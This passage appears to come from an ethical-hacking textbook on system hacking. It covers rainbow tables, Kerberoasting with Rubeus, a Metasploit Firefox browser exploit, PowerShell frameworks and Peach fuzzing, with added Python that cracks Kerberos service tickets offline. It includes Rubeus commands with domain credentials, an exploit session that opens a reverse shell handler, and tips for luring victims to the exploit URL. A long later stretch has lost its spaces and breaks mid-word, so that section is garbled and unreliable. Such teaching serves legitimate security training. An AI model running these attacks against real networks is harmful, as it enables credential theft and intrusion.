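The chain and reduction-function parameters above are easier to reason about with a table you can hold in your head, so here is an added example (not RainbowCrack's code) that builds a miniature MD5 rainbow table over rtgen's loweralpha-numeric charset and then does what rcrack does: walks the reductions backwards from a target hash to find the chain that contains it, regenerates that chain from its stored start point, and verifies the hit. It goes one step beyond the page by showing the lookup side as well as the generation side. The charset, 4-character plaintext length, 400 chains and chain length of 100 are deliberately tiny choices made here; the reduction function is a simple one of my own, not rtgen's.

```python
"""Rainbow chains in miniature (added example; not RainbowCrack's code).

Same idea as rtgen/rcrack above: a chain alternates hash and "reduce" steps,
only its start and end points are stored, and a lookup walks the reductions
backwards to find the chain that contains the target hash. The charset,
plaintext length and chain parameters are deliberately tiny.
"""
import hashlib

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"   # rtgen's loweralpha-numeric
PLAIN_LEN = 4                                     # fixed-length plaintexts only
SPACE = len(CHARSET) ** PLAIN_LEN                 # 36^4 = 1,679,616 plaintexts


def index_to_plain(n: int) -> str:
    """Map an integer in [0, SPACE) to a plaintext (rtgen's sequential start points)."""
    chars = []
    for _ in range(PLAIN_LEN):
        n, r = divmod(n, len(CHARSET))
        chars.append(CHARSET[r])
    return "".join(chars)


def H(plain: str) -> bytes:
    return hashlib.md5(plain.encode()).digest()


def reduce_fn(digest: bytes, position: int, table_index: int = 0) -> str:
    """Reduction function: hash -> plaintext. The chain position is mixed in so
    each column uses a different function (what makes a table "rainbow").
    table_index plays the role of rtgen's table index / reduce offset."""
    n = int.from_bytes(digest[:8], "little") + position + (table_index << 16)
    return index_to_plain(n % SPACE)


def build_table(chain_count: int, chain_len: int, table_index: int = 0) -> dict:
    """Return {end_point: start_point}; everything in between is recomputed on demand."""
    table = {}
    for i in range(chain_count):
        start = plain = index_to_plain(i)       # sequential starting points, like rtgen
        for pos in range(chain_len):
            plain = reduce_fn(H(plain), pos, table_index)
        table.setdefault(plain, start)          # merged chains keep the first start
    return table


def lookup(target: bytes, table: dict, chain_len: int, table_index: int = 0):
    """Recover the plaintext for target (an MD5 digest) or return None."""
    for pos in range(chain_len - 1, -1, -1):
        # Assume the target sits at column pos: finish the chain from there.
        plain = reduce_fn(target, pos, table_index)
        for p in range(pos + 1, chain_len):
            plain = reduce_fn(H(plain), p, table_index)
        start = table.get(plain)
        if start is None:
            continue
        # Candidate chain found: walk it from the start and verify the hash
        # (guards against false alarms from merged chains).
        plain = start
        for p in range(chain_len):
            if H(plain) == target:
                return plain
            plain = reduce_fn(H(plain), p, table_index)
    return None


CHAIN_LEN = 100
TABLE = build_table(chain_count=400, chain_len=CHAIN_LEN)


def chain_member(start_index: int, column: int) -> str:
    """Plaintext at a given column of the chain that starts at start_index."""
    plain = index_to_plain(start_index)
    for pos in range(column):
        plain = reduce_fn(H(plain), pos)
    return plain


if __name__ == "__main__":
    secret = chain_member(7, 42)
    print(f"table: {len(TABLE)} chains x {CHAIN_LEN} columns, 16 bytes each if stored like rtgen")
    print(f"md5({secret!r}) -> {lookup(H(secret), TABLE, CHAIN_LEN)!r}")
```

The cost structure is the one the rtgen paragraph describes: generation does chain_count * chain_len hash operations once, the file stores only chain_count pairs, and a lookup costs about chain_len^2 / 2 operations instead of a full brute force. Only plaintexts that actually occur in some chain can be recovered, which is why coverage, not file size, is the number to care about when you download tables.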
Running rcrack with Rainbow Tables

root@kali:~# rcrack . -lm passwords.txt
1 rainbow tables found
no hash found
result
-------

There is a second reason this run could never have produced anything: the one table found is the MD5 table generated above, and an LM hash can only be looked up in a table generated for the LM algorithm. As noted, the algorithm of the table and the algorithm of the hashes have to match.

One thing to note here with respect to the location of the rainbow tables is that they are not actually stored in the directory from which rcrack is run. Instead, the rainbow tables are stored in /usr/share/rainbowcrack on the Kali system from which this was run. When you run rtgen, the table is stored in that directory because that's where the binaries are located. The current directory in this instance is the directory where rcrack is rather than the directory where the user is.

Kerberoasting

Kerberoasting is another type of password cracking attack, one that relies on getting access to a network. The name comes from Kerberos, the protocol Active Directory uses for authentication over a network. Kerberos, in turn, is named for the three-headed dog of Greek mythology who guarded the gates of the Underworld to prevent those there from leaving. It was originally developed at the Massachusetts Institute of Technology (MIT) as part of Project Athena, which was also responsible for other projects like the X Window System, a graphical user interface framework for Unix-like systems.

Kerberos works in a client-server mode. Figure 7.3 shows a diagram of how Kerberos works across its three exchanges: client authentication to the Authentication Server (AS), the client requesting a service ticket from the Ticket Granting Server, and the client presenting that ticket to the service it wants to use. Messages between the client and the Kerberos servers are encrypted using a key on the client side, which is derived from the user's password in cases where it relies on a user to authenticate to request services on the network. If the server decrypts using the key it knows about and doesn't get the right data out, it says the password is incorrect, so the authentication attempt fails. Kerberos has been the authentication protocol in Windows Active Directory (AD) implementations since Windows 2000.

FIGURE 7.3 Kerberos authentication (Courtesy Jeran Renz by Creative Commons Attribution Share-Alike)

The Kerberos architecture specifies several services, which may all be on the same system or may be separate servers. First is the key distribution center (KDC). The KDC is a common component in cryptosystems, where it protects key management. The KDC hosts two services. The authentication service (AS) issues a time-stamped ticket-granting ticket (TGT) to a client that proves knowledge of its password; the TGT is encrypted using the secret key of the ticket-granting service, so the client can present it but not read or alter it. The ticket-granting service (TGS) accepts a TGT and issues service tickets, each encrypted under the key of the service it is meant for. The encryption protects the overall design, as tickets can't be forged without the key that belongs to the TGS or the service. Additionally, because they are time-stamped, tickets help protect against replay attacks, where a message that was previously captured gets put back onto the network in order to get access to a service protected by Kerberos.

To perform a Kerberoasting attack, you need to have compromised an account on the domain. Any domain user will do: requesting service tickets requires no special privileges. The compromised user account receives a TGT from the KDC when it authenticates, signed (encrypted) with the key of the krbtgt account, the service account that belongs to the ticket-granting service in the AD design. The attacker, who has control of the compromised user account, wants to compromise a service on the network. They request a service ticket for that service's service principal name (SPN). A domain controller with the Active Directory infrastructure creates the service ticket and encrypts it with a key derived from the service account's password, retrieved from the AD database; for the RC4_HMAC encryption type that key is the account's NT hash. The only two entities that have the key that could decrypt the ticket at this point are the domain controller and the service itself. The domain controller sends the ticket to the user, who is under the control of the attacker. Normally the client would then present the ticket to the service, which decrypts it to determine whether the user has been granted permission, but the attacker never has to contact the service. The ticket is in memory on the compromised host and can be extracted from there so it can be decrypted, that is, cracked, offline. Every guess is checked against the ticket alone, so the domain controller sees one ordinary ticket request and nothing else. The attack is viable against accounts with SPNs whose passwords were set by a person, typically service accounts; computer accounts also have SPNs, but their passwords are long, random and rotated.

There are a number of tools that can be used to implement a Kerberoasting attack. One of these is a tool called Rubeus. The following is an example of running Rubeus against a Windows domain controller at 192.168.4.218. This run provides a username and password that has authentication credentials on the domain. You could also provide a password hash if that's what you had available to you. This will retrieve a TGT for that user. The ticket could be stored to a file and used later. Rubeus will do the storage for you if you provide the correct command-line parameter.

PS C:\Users\RicMessier\Documents> .\rubeus.exe asktgt /user:bogus /password:AB4dPW2021! /domain:washere.local /dc:192.168.4.218

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: Ask TGT

[*] Using rc4_hmac hash: DDB5401FAB757F3323C628F1A3EAFAEA
[*] Building AS-REQ (w/ preauth) for: 'washere.local\bogus'
[+] TGT request successful!
[*] base64(ticket.kirbi):

  ServiceName           :  krbtgt/washere.local
  ServiceRealm          :  WASHERE.LOCAL
  UserName              :  bogus
  UserRealm             :  WASHERE.LOCAL
  StartTime             :  1/10/2021 3:36:21 PM
  EndTime               :  1/11/2021 1:36:21 AM
  RenewTill             :  1/17/2021 3:36:21 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  jn2pxBOReqmMOs6M9WxUuA==

Technically, this is not a Kerberoasting attack, though it is an attack against a domain controller to gather tickets that could be used later. To run a Kerberoasting attack, you would use something like the following command line. Note that in the kerberoast action the /user: parameter names the account to roast, not the account you authenticate as; leave it out and Rubeus searches LDAP for every account with a servicePrincipalName set.

PS C:\Users\RicMessier\Documents> .\rubeus.exe kerberoast /user:bogus /domain:washere.local /dc:192.168.4.218

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User            : bogus
[*] Target Domain          : washere.local
[*] Searching path 'LDAP://192.168.4.218/DC=washere,DC=local' for Kerberoastable users

The notice matters for the cracking step: an RC4_HMAC ticket is keyed directly by the NT hash and cracks quickly, while AES tickets are keyed by a PBKDF2-derived key and cost far more per guess, which is why Rubeus offers ways to force RC4 where the account still allows it. This type of attack can allow you to gather additional credentials that will let you move laterally, even though it requires a foothold in the network already. That foothold can be achieved using malware to provide remote access. Malware is covered in Chapter 8, including creation of malware that could be used to provide remote access to a system.
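Rubeus prints each roasted ticket in the format hashcat and John consume (hashcat mode 13100, $krb5tgs$23$...). The following added example (not Rubeus code and not the book's) shows what the cracker does with one of those lines for encryption type 23, RC4_HMAC as specified in RFC 4757: derive the NT hash of each candidate password, undo the RC4-HMAC wrapping of the ticket, and check the HMAC-MD5 checksum. MD4 and RC4 are implemented in the script because hashlib does not guarantee either under OpenSSL 3. The service account, its password, the confounder and the ticket body are constructed here; a real ticket body is an ASN.1 EncTicketPart, and hashcat uses its leading tag bytes as a quick pre-check before the full checksum comparison.

```python
"""Offline cracking of a Kerberoast ticket (added example; not Rubeus code).

Rubeus hands back the service ticket in hashcat's $krb5tgs$23$ format. This
shows what the cracker does with it for etype 23 (RC4-HMAC, RFC 4757): derive
the NT hash of each candidate password, undo the RC4-HMAC encryption, and
check the HMAC-MD5 checksum. MD4 and RC4 are implemented here because neither
is guaranteed to be available from hashlib/OpenSSL. The ticket below is
constructed in this script (a real one carries an ASN.1 EncTicketPart).
"""
import hmac
import struct

M32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 of the UTF-16LE password."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & M32
    rounds = (
        (lambda b, c, d: (b & c) | (~b & d), list(range(16)), (3, 7, 11, 19), 0),
        (lambda b, c, d: (b & c) | (b & d) | (c & d),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda b, c, d: b ^ c ^ d,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for f, order, shifts, k in rounds:
            for i in range(16):
                aa = rotl((aa + f(bb, cc, dd) + x[order[i]] + k) & M32, shifts[i % 4])
                aa, bb, cc, dd = dd, aa, bb, cc      # rotate registers: a,d,c,b take turns
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):                                  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                                     # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, "md5").digest()


KEY_USAGE_TGS_REP_TICKET = 2   # Kerberos key usage number for the ticket's enc-part


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 encrypt: returns checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(key, struct.pack("<I", KEY_USAGE_TGS_REP_TICKET))
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)          # K2 == K1 for RC4-HMAC
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)


def krb5tgs_line(user: str, realm: str, spn: str, edata: bytes) -> str:
    """hashcat mode 13100 / John krb5tgs format, as Rubeus prints it."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"


def crack_krb5tgs(line: str, wordlist):
    """Return the service account password that decrypts the ticket, or None."""
    *_, checksum_hex, edata2_hex = line.split("$")
    checksum, edata2 = bytes.fromhex(checksum_hex), bytes.fromhex(edata2_hex)
    for candidate in wordlist:
        k1 = hmac_md5(nt_hash(candidate), struct.pack("<I", KEY_USAGE_TGS_REP_TICKET))
        k3 = hmac_md5(k1, checksum)
        plaintext = rc4(k3, edata2)
        # hashcat short-circuits on the ASN.1 tag of the decrypted EncTicketPart;
        # comparing the checksum is the full verification.
        if hmac_md5(k1, plaintext) == checksum:
            return candidate
    return None


# Constructed sample: a service account with a weak password, its ticket encrypted
# under the account's NT hash, and the roast line a cracker would be handed.
SERVICE_PASSWORD = "Summer2021!"
TICKET_BODY = b"\x63\x82\x04\x10" + b"constructed-ticket-body-" * 8   # stands in for EncTicketPart
CONFOUNDER = b"\x11\x22\x33\x44\x55\x66\x77\x88"                       # random in a real KDC
ROAST_LINE = krb5tgs_line("svc_sql", "WASHERE.LOCAL", "MSSQLSvc/db01.washere.local:1433",
                          rc4_hmac_encrypt(nt_hash(SERVICE_PASSWORD), TICKET_BODY, CONFOUNDER))
WORDLIST = ["Password1", "Welcome1", "Summer2021!", "P@ssw0rd"]


if __name__ == "__main__":
    print(ROAST_LINE[:90] + "...")
    print("cracked:", crack_krb5tgs(ROAST_LINE, WORDLIST))
```

Per guess the work is one MD4, three HMAC-MD5s and one RC4 pass over the ticket, which is why RC4 roasts crack at tens of millions of guesses per second on a GPU and why an AES-only service account (or, better, a group managed service account with a random 120-character password) is the defensive answer rather than hiding the SPN.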
You might also use a phishing attack to gather credentials from a user, which can then be used to get access to systems. It's important to keep in mind that you need to have command-line access on a system to run a tool like Rubeus. As it isn't on the system to start with, you would need to compile it and get it onto the target system.

Kerberoasting Notes

A couple of notes on the Kerberoasting demonstrated here. First, all output with anything sensitive has been altered. Second, in case it amuses you, presumably the tool Rubeus was named after Rubeus Hagrid, the gamekeeper from the Harry Potter books. Hagrid had a three-headed dog named Fluffy in the first book, which would be the connection between Rubeus and Kerberos.

Client-Side Vulnerabilities

Of course, listening services aren't the only way to gain access to systems. In fact, they aren't necessarily even the best way. Some of that depends on what you, as an attacker, are looking for. Attackers may be looking for computing and network resources, in which case any system would do. That means more systems are better, and there are generally more desktops than servers. Users are also generally an easier pathway into the system. This can call for client-side vulnerabilities, that is, vulnerabilities that exist on the desktop and aren't exposed to the outside world without client interaction. For example, there may be a vulnerability in a mail client. An attacker could trigger that vulnerability not by probing the outside of the desktop system but instead by sending email to a victim. The victim on the client system opens the email, the vulnerability is triggered, and the attacker gains access to the system.

Web browsers make convenient attack vectors, for several reasons. One is that they are among the most commonly used applications. Not everyone uses email clients like Outlook or Thunderbird anymore, though email clients once were very commonly used. Many people use a web browser to access their email. Browsers are used for so many other common functions that they can be the only application some people ever use. Think about Chrome OS and the Chromebook that runs it as examples. Chrome OS uses the browser as the user interface. As Chrome OS began life as a thin web client, most applications you will run on Chrome OS run inside a browser context.

Another factor that makes the browser a nice target is that there just aren't a lot of browsers in use. Data from a couple of different sources shows that Chrome is, by far, the predominant browser in use around the world. This is followed, distantly, by browsers like Internet Explorer, Firefox, Safari, and Edge. As a result, if you can find a vulnerability that affects Chrome on Windows, you'll be in the money. The problem with that is that Google tends to be extremely diligent when it comes to finding and fixing vulnerabilities, and Chrome's sandboxing means a single renderer bug is rarely enough on its own, so Metasploit carries very few exploit modules for Chrome itself. Other browsers do have modules associated with them. One example is a vulnerability in Firefox on macOS. Here you can see loading this module in msfconsole.

Firefox Exploit Module in msfconsole

msf > use exploit/osx/browser/mozilla_mchannel
msf exploit(osx/browser/mozilla_mchannel) > show options

Module options (exploit/osx/browser/mozilla_mchannel):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Firefox 3.6.16 on Mac OS X (10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3)

msf exploit(osx/browser/mozilla_mchannel) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.86.62:4444
msf exploit(osx/browser/mozilla_mchannel) > [*] Using URL: http://0.0.0.0:8080/4ZhKAQwCLkOt
[*] Local IP: http://192.168.86.62:8080/4ZhKAQwCLkOt
[*] Server started.

You'll see a couple of things here. This exploit starts a server. This means you need to indicate what IP address the server should be listening on, as well as the port. By default, the server will be listening on 0.0.0.0, which means every IP address on the system. You can also specify the port. On a Unix-like system, listening on ports with numbers lower than 1024 requires root privileges. By default, the module listens on port 8080. When the server starts up, a URL path is randomly generated, though you can provide one in the options (URIPATH) if you prefer. Once the server starts up, the module prints the URL. Starting the exploit also creates a listener, expected to handle the return connection from the target system. The return connection comes from the payload that is delivered to the target when they make the connection, if the vulnerability is exploited. Note the exact target list: the module is written for one Firefox release on a handful of Mac OS X versions, so a browser outside that list fetching the URL will get nothing useful, and browser exploit servers routinely check the User-Agent before serving anything.

This means that you need to get the URL to your target. There are several ways to do that, including sending email with the URL obscured, since a URL that includes elements like :8080 and then a random string may be suspicious. This is not to say that you need to use the random string or the unusual port. You could also create a link in a web page that you expect your targets to regularly visit. The URL could be loaded automatically by placing it in a page element like an IMG tag. A browser encountering that tag will issue a GET request to the URL provided.
291OnceyougetyourvictimtovisittheURL,theirbrowsermakesarequestthatgetshandledbyMetasploit.Themoduleshouldsendtheexploitcodetothebrowser.Iftheexploitissuccessful,itshouldfireaconnectionbacktothehandlerthattheexploitstartedup.Whatyou’llgetbackfromthatconnectionisashellonthesystem.SincetheexploitisagainstamacOS(OSX)systemandmacOSusesaUnix-­likeoperatingsystemanduserland,whatyou’llgetbackisaBashshellwhereyoucansendcommands.Thisparticularexploitdoesn’tsupportaMeterpreterpayload.Gainingaccesstothesystemisonlypartofwhatanattackerwoulddo,soit’sonlypartofwhatyouwouldbedoingasanethicalhacker.Gainingaccessisonlyastart.LivingOffthe LandSofar,we’vebeenlookingatusingtoolsthatyouwouldneedtogetontoaremotesystem.Acommonapproachofattackerstoday,aswellasanyoneinthesecuritytestingbusiness,issomethingcalledlivingofftheland.Thismeansmakinguseoftoolsthatarealreadyavailableonthetargetsystem.Fortunately,whenitcomestoWindowssystems,wegetalotofhelp.Microsofthasbeenprovidinganincreasinglypowerfulprogramminglanguage,PowerShell,withWindowsinstallations.Whileitmayhavebeenlimitedwhenitwasfirstintroducedin2006,itwasacontinuationofattemptsbyMicrosofttoenhancescriptingcapabilitiesonWindowssystems.Afterall,Unix-­likeoperatingsystemssuchasLinuxhavehadscriptinglanguagesbuiltinfromthebeginning.ThenativeinterfaceonUnixandLinuxsystemshasalwaysbeenacommand-­lineinterfacethatisthescriptinglanguageinterpreter,calledashell.Inrecentyears,MicrosofthasopenedupPowerShelltomoreplatformsthanjustWindows.YoucangetPowerShellforbothLinuxandmacOS.ThisisslightlydifferentfromthePowerShellthatcomesbuiltintomostWindowsinstallations.YoucaninstallthesameversionofPowerShellonWindowsastheversion,currentlymajorversion7,availablefortheotheroperatingenvironments,butit’snotcurrentlyinstalledbydefaultwithWindows10,forinstance.PowerShellisanobject-­orientedprogramminglanguagethatusesfeaturescalledcmdletstoprovidefunctionality.Ratherthanjusthavingastraightforwardlanguageandsyntax,PowerShellisbuilttobeextended.Youcancertainlyusethecorel
anguagefeaturestowriteprograms,butyoucanalsowritethesecmdletsorusetheonesbuiltintothelanguagetogetaccesstocomplexfunctionalityfortasks.InadditiontoPowerShellbeingapowerfulprogramminglanguageinitself,therearesomeexploitationframeworksthataredevelopedinPowerShell.Theyarecurrentlyinvariousstatesofmaintenance.Forinstance,Empireisapost-­exploitationframeworkwritteninPowerShell,meaningthisisasetoftoolsyouwoulduseafteryouhadalreadyexploitedasystem.Youmaygetaccesstotheabilitytoeasilyescalateprivilegesorcollectpasswords,forinstance.MuchlikeMetasploit,thisrequiresanagenttobeinstalledonthetargetsystemthatyoucommunicatewith.Empireappearstonolongerbesupported,thoughyoucanstillgrabthesourcecodeforit.292 Chapter7  SystemHacking■AnothertoolisPowerSploit.Thisisanothertoolthatisnolongeractivelymaintained,butyoucangrabitandmakeuseofit.Itprovidesanumberofcmdletsthatincludefunctionsforcodeexecution,persistence,exfiltration,privilegedescalation,reconnaissance,andothers.Again,whileit’snotactivelymaintained,youcangrabthecollectionofscriptsforuse.FuzzingAtechniquethatcanbeusedforbothfindingbugsinsoftwareandpotentiallycausingdenial-­of-­serviceattacksisfuzzing.Thisisawordusedasshorthandtodescribetheprocessofsendingunexpectedormalformeddataintoanapplicationtoseehowthatapplicationhandlesit.Iftheapplicationhandlesitnicely,nothingofinteresthappens.Youmaygetanerror,orthedatamaysimplybediscarded.Forourpurposes,that’snotveryinteresting.Iftheapplicationdoesn’thandleitnicely,theapplicationmaycrash.Thiswasoneofthosetechniquesthatwaspopularforaperiodoftime,thoughmayhavefallenoffalittle.Therewereoncealotofdifferentprojectsthatperformedfuzzing.Someofthosedon’texistanymore,ortheymaynolongerbemaintained.Someofthemhavebecomecommercialtools.Oneofthefirstfuzzerscameoutofanacademicproject.ItwascalledCodenomicon,anditwasusedtoidentifyseriousvulnerabilitiesinDNSandSNMP.Sincethen,thevalueofsendingmalformeddataintoanapplicationwasthoughttobeagoodwaytotestsoftwaremorerigorously.Thesedays,softwaredevelopmentteamsare
doingabetterjoboftestingtheseanomalies,whichmayexplainwhytherearen’tasmanyprojectsdoingit.Ontopofthat,fuzzingishardwork.It’snotassimpleasjustrunningaprogramthatgoesoffandfindsvulnerabilitiesandexploits.First,evenfindingavulnerabilityishard.Ifyoucanfindoneofthose,thereisnoguaranteeitwilltranslatetoanexploit.Let’ssayyouaregoingtorunafuzzeragainstanapplication.Iftheapplicationcrashes,whatdoyouknow?Youknowyoucrashedanapplication.Withoutalotofmonitoringandinstrumentation,youdon’tknowwhereintheapplicationitcrashed.Youmaynotevenknowverywellwhatmessagecausedthecrash.Theweirdthingaboutsoftwareisyoumaygetacumulativeeffect.Aseriesofmessagesmaycauseaproblemthatmayappearasthoughasinglemessagecausedthefailure.Narrowingdownthesetofmessagesishardwork.Havingsaidallthat,therearesometoolsavailablethatyoucanuseforfuzzing.ThereisanoldertoolcalledSulley,namedforthefuzzycharacterfromMonsters,Inc.(presumablybecauseMikedidn’thavethesamering),thatstoppedbeingdevelopedandthenwaspickedupagainandupdated.It’snowinastatethatmayrequirealittleworktogetfunctional,butyoucouldlookatit.TheonewewilllookathereiscalledPeach(getit?peach?fuzz?).Thisisatoolthatcanhandlebothnetworkaswellasfilefuzzing.Ittakescareoftheinstrumentationaspectbyallowingyoutostartupamonitordevice.PeachusesXMLasadefinitionlanguage.TowriteafuzzingtestinPeach,youhavetocreateanumberofelements.First,youneedtocreateadatamodel.Thisdefinesthedatathatwillbesentintotheapplication.Youmayhavemultipledatamodels.ThedatamodelstellPeachwhatpartswillbemanipulatedtosendbaddataintotheapplication.OnceyouFuzzing 
293haveyourdatamodel(s)defined,youneedtocreateastatemodel.ThistellsPeachhowthedatamodelswillbeused.ThefollowingisasimpleexampleofcreatingadatamodelandassociatedstatemodelforPeachthatwillfuzzanHTTPrequest.Thesealonearenotsufficient.Youneedapublisher.ThistellsPeachhowit’sgoingtocommunicatewiththeapplication.Inthiscase,youwoulduseanetworkpublisher,andPeachincludessomepredefinedpublishersfornetworkcommunication.ThefollowingistheXMLthatdefinestheoveralltestforPeach,includingthepublisher.Italsodefinesalogger,sowehaveevidenceofwhathappened.Watchingtheoutputonthescreencanbechallengingsinceyoumaygetalotofoutputandit’shardtofollow.Whatyoucanseecommentedoutinthisistheremoteagent,whichisusedtomonitortheapplication.Inthiscase,we’dmonitortheHTTPserverforcrashes.ThisletsPeachknowhowtocommunicatewiththeremotemonitoringapplicationsoitcansyncupwhatitsentwithwhathappenedontheremoteserver.-­-­>294 Chapter7  SystemHacking■Asnoted,yougetalotofoutput.Peachwilldeterminehowmanytestsitrunsbasedonthedatamodelsdefined.ThefollowingisasetofoutputfromPeachrunningthetestdefinedearlier:PSC:\Users\RicMessier\Downloads\peach>.\peach.exe.\samples\http.xml[[Peachv3.1.124.0[[Copyright(c)MichaelEddington[*]Test'Default'startingwithrandomseed43275.[R1,-­,-­]Performingiteration[1,-­,-­]Performingiteration[*]Fuzzing:HttpRequest.DataElement_1[*]Mutator:UnicodeBomMutator[*]Fuzzing:HttpRequest.DataElement_0[*]Mutator:DataElementRemoveMutator[*]Fuzzing:HttpRequest.DataElement_2[*]Mutator:UnicodeBomMutator[*]Fuzzing:HttpRequest.DataElement_4[*]Mutator:UnicodeBadUtf8Mutator[*]Fuzzing:HttpRequest.DataElement_3[*]Mutator:UnicodeBomMutator[2,-­,-­]Performingiteration[*]Fuzzing:HttpRequest.DataElement_1[*]Mutator:UnicodeBadUtf8Mutator[*]Fuzzing:HttpRequest.DataElement_3[*]Mutator:UnicodeUtf8ThreeCharMutator[3,-­,-­]Performingiteration[*]Fuzzing:HttpRequest.DataElement_1[*]Mutator:UnicodeUtf8ThreeCharMutator[*]Fuzzing:HttpRequest.DataElement_3[*]Mutator:StringMutator[*]Fuzzing:HttpRequest.DataElement_4[*]Mutator:Unico
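The Peach output above names the two halves of a network fuzzer: the data elements of a request and the mutators applied to them, one element at a time. The following is an added example (not Peach, not the book's XML) of the same structure written out directly in Python: an HTTP request split into elements, mutators modelled on the ones Peach reported (BOM insertion, bad UTF-8, three-byte sequences, oversized strings, element removal) plus a format-string probe, and a probe function that plays the monitor's role by classifying how the target answered. generate_cases() runs offline; the target host and port in run() are assumptions you would point at a test server.

```python
"""A small network fuzzer in the spirit of the Peach run above (added example;
not Peach code). It takes an HTTP request split into elements, applies
mutators like the ones Peach reported (BOM insertion, bad UTF-8, oversized
strings, element removal), and reports cases where the target stopped
answering, which is the crash signal a monitor would pick up. Host and port
are assumptions; generate_cases() works offline.
"""
import itertools
import socket

# The template's elements are fuzzed one at a time, like Peach's DataElement_n.
TEMPLATE = {
    "method": b"GET",
    "path": b"/index.html",
    "version": b"HTTP/1.1",
    "host": b"Host: target.example",
    "ua": b"User-Agent: fuzzer/0.1",
}

MUTATORS = {
    "UnicodeBom": lambda v: b"\xef\xbb\xbf" + v,                   # UTF-8 BOM prefix
    "BadUtf8": lambda v: v + b"\xc0\xaf\xed\xa0\x80",                # overlong "/" and a lone surrogate
    "Utf8ThreeChar": lambda v: v + "\u2028".encode("utf-8") * 16,    # valid 3-byte sequences
    "LongString": lambda v: v + b"A" * 4096,                          # classic overflow probe
    "FormatString": lambda v: v + b"%n%s%x" * 8,                      # printf-style sink probe
    "Remove": lambda v: b"",                                          # DataElementRemove
}


def build_request(elements: dict) -> bytes:
    """Assemble the request; removed (empty) elements simply vanish."""
    line = b" ".join(x for x in (elements["method"], elements["path"], elements["version"]) if x)
    headers = b"\r\n".join(x for x in (elements["host"], elements["ua"]) if x)
    return line + b"\r\n" + headers + b"\r\n\r\n"


def generate_cases(template=TEMPLATE, mutators=MUTATORS):
    """Yield (element, mutator, request) for every single-element mutation."""
    for (name, mutate), element in itertools.product(mutators.items(), template):
        mutated = dict(template)
        mutated[element] = mutate(template[element])
        yield element, name, build_request(mutated)


def probe(request: bytes, host: str, port: int, timeout: float = 3.0) -> str:
    """Send one case; classify by how the target responds (the 'monitor')."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(request)
            data = s.recv(4096)
    except ConnectionRefusedError:
        return "down"          # nothing listening any more: likely crashed
    except (ConnectionResetError, socket.timeout, OSError):
        return "no-response"   # reset or hang: worth reproducing by hand
    return "ok" if data.startswith(b"HTTP/") else "garbage"


def run(host="127.0.0.1", port=8080):
    """Assumed target; stop at the first case after which nothing listens."""
    for element, mutator, request in generate_cases():
        result = probe(request, host, port)
        print(f"{result:12} {element:8} {mutator}")
        if result == "down":
            print("target stopped responding; last request:", request[:120])
            break


if __name__ == "__main__":
    run()
```

The bookkeeping in run() is the part the fuzzing paragraph calls hard work: a crash only becomes a bug report once you know which case preceded it, which is why the loop records the last request and stops, and why Peach pairs its output with a monitoring agent rather than relying on the fuzzer's own view.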
This is not the only type of fuzzing, though. Local vulnerabilities may not be reachable through network services. Instead, they may require files to trigger. Peach will work with file-based fuzzing as well. In this case, you would need a sample file that could be manipulated as needed to trigger a crash. Peach would repeatedly open the file with altered data. The monitoring required for this would occur on the same system where the testing was being executed, which is not necessarily the case for network-based testing.

Post Exploitation

